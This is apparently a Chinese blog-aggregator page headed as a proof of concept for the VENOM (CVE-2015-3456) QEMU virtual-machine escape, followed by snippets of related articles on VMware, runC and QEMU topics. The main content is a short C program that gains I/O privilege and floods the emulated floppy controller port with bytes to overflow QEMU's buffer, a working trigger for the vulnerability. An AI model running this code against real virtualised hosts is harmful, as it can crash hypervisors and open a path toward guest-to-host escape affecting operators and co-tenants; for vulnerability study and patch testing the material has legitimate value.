VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞POC

#include <sys/io.h>

int main()
{
        int i ;
        iopl(3);

        outb(0x8e, 0x3f5);
        outb(0x41, 0x3f5);
        outb(0x41, 0x3f5);
        outb(0x41, 0x3f5);
        outb(0x41, 0x3f5);
        outb(0x41, 0x3f5);

        for(i = 0 ; i < 100000 ; i++)
        {
                outb(0x42, 0x3f5);
        }
        return 0 ;
}

  

时间: 2024-10-10 01:44:52

VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞POC的相关文章

[转帖]浅析虚拟机逃逸漏洞

浅析虚拟机逃逸漏洞 https://www.freebuf.com/column/197651.html “云时代”的虚拟机安全被提升到至关重要的位置.虚拟机逃逸指的是突破虚拟机的限制,实现与宿主机操作系统交互的一个过程,攻击者可以通过虚拟机逃逸感染宿主机或者在宿主机上运行恶意软件. 浅析虚拟机逃逸漏洞 一. 漏洞背景 VMware,Inc. (Virtual Machine ware)是一个“虚拟PC”软件公司,提供服务器.桌面虚拟化的解决方案.其虚拟化平台的产品包括播放器:它能使个人用台式电

GitHub现VMware虚拟机逃逸EXP,利用三月曝光的CVE-2017-4901漏洞

今年的Pwn2Own大赛后,VMware近期针对其ESXi.Wordstation和Fusion部分产品发布更新,修复在黑客大赛中揭露的一些高危漏洞.事实上在大赛开始之前VMware就紧急修复了一个编号为CVE-2017-4901的虚拟机逃逸漏洞. 而近日,有人在GitHub上公布了一个VMWare虚拟机逃逸利用工具,工具正是这个CVE-2017-4901,它能够攻击12.5.5版本之前的VMware WorkStation,目标主机为Windows 10 x64.漏洞利用工具所使用到的编译器是

【转载】利用一个堆溢出漏洞实现 VMware 虚拟机逃逸

1. 介绍 2017年3月,长亭安全研究实验室(Chaitin Security Research Lab)参加了 Pwn2Own 黑客大赛,我作为团队的一员,一直专注于 VMware Workstation Pro 的破解,并成功在赛前完成了一个虚拟机逃逸的漏洞利用.(很不)幸运的是,就在 Pwn2Own 比赛的前一天(3月14日),VMware 发布了一个新的版本,其中修复了我们所利用的漏洞.在本文中,我会介绍我们从发现漏洞到完成利用的整个过程.感谢@kelwin 在实现漏洞利用过程中给予的

转:利用一个堆溢出漏洞实现VMware虚拟机逃逸

转:https://zhuanlan.zhihu.com/p/27733895?utm_source=tuicool&utm_medium=referral 利用一个堆溢出漏洞实现VMware虚拟机逃逸 [作者:李小龙(acez),中文翻译:kelwin] 1. 介绍 2017年3月,长亭安全研究实验室(Chaitin Security Research Lab)参加了Pwn2Own黑客大赛,我作为团队的一员,一直专注于VMware Workstation Pro的破解,并成功在赛前完成了一个虚

2015年11月数据安全漏洞分析报告

报告核心观点 1.千帆过尽,SQL注入仍"不改" 2.本月金融业漏洞增长尤为突出 3.11月常见数据泄露原因分析 4.解决弱口令安全建议 报告正文 2015年11月,安华每日安全资讯总结发布了126个数据泄密高危漏洞,这些漏洞分别来自乌云.补天.漏洞盒子等平台,涉及8个行业,公司机构.互联 网.交通运输.教育.金融.能源.运营商.政府.漏洞类型涉及,SQL注入.系统漏洞.弱口令等7类,其中SQL注入仍然是漏洞类型的重灾区. 千帆过尽,SQL注入仍"不改" 数据安全问

Qemu虚拟机 玩树莓派最新版系统 (截止2017-04-10)

Qemu虚拟机可以玩 树莓派,大家都知道了吧.可是网上的教程好老,都是2012年的.我按照教程下载了最新版版本的树莓派系统怎么也跑不起来. 研究了好久,终于找到一个简单的方法,特意分享出来.转载请注意出处. 如果能帮你解决大问题,请给我留言鼓励.谢谢! 本文出处:http://www.cnblogs.com/chengchen/p/6751420.html 1. 在网站下载最新版Qemu http://www.qemu.org/ 我用的版本是2017年4月20日的 v2.9.0 2. 在 网站下

跟我一起写操作系统(三)——打印函数和qemu虚拟机

转载注明出处:http://www.cnblogs.com/lucasysfeng/p/4847662.html 上一讲地址:http://www.cnblogs.com/lucasysfeng/p/4847662.html 项目地址:https://github.com/lucasysfeng/lucasOS 本讲主要涉及以下三个方面:1. 打印函数封装:2. qemu的使用:3. 项目目录结构调整. 理由如下:1. 后续开发无疑会遇到打印变量的操作,因此有必要封装打印函数(内核开发阶段,无法

基于QMP实现对qemu虚拟机进行交互

本文详解QMP,包含qmp.hmp.qemu-guest-agent的介绍.工作原理.配置方法.范例 小慢哥的原创文章,欢迎转载 目录 ? QMP介绍? QMP语法? 单独使用qemu,启用QMP? 通过libvirt启动qemu,启用QMP? qemu-guest-agent(qemu-ga)? 官方参考文档 QMP介绍 qemu对外提供了一个socket接口,称为qemu monitor,通过该接口,可以对虚拟机实例的整个生命周期进行管理,主要有如下功能 ? 状态查看.变更? 设备查看.变更

新近爆出的runC容器逃逸漏洞,用户如何面对?

runC是一个根据OCI(Open Container Initiative)标准创建并运行容器的CLI工具,目前Docker引擎内部也是基于runc构建的. 2019年2月11日,研究人员通过oss-security邮件列表(https://www.openwall.com/lists/oss-security/2019/02/11/2 )披露了runc容器逃逸漏洞的详情,根据OpenWall的规定EXP会在7天后也就是2019年2月18日公开. 此漏洞允许以root身份运行的容器以特权用户身